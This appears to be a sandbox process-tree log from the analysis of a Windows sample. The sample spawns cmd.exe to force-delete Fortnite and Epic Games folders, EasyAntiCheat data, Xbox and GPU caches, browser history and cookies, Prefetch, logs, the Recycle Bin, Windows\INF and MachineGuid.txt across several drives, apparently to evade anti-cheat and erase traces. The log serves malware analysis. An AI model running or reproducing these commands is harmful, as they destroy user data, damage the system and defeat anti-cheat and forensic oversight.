- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:6012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:5288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\Intel
    3⤵
    PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\INF
    3⤵
    PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\Public\Documents
    3⤵
    PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\temp
    3⤵
    PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:5752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\Intel
    3⤵
    PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s %systemdrive%\$Recycle.Bin >nul 2>&1
    3⤵
    PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s d:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s e:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s f:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:5184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState
    3⤵
    PID:6056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\EcsCache0
    3⤵
    PID:308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3
    3⤵
    PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\ntuser.ini
    3⤵
    PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\System Volume Information\IndexerVolumeGuid
    3⤵
    PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Windows\System32\restore\MachineGuid.txt
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
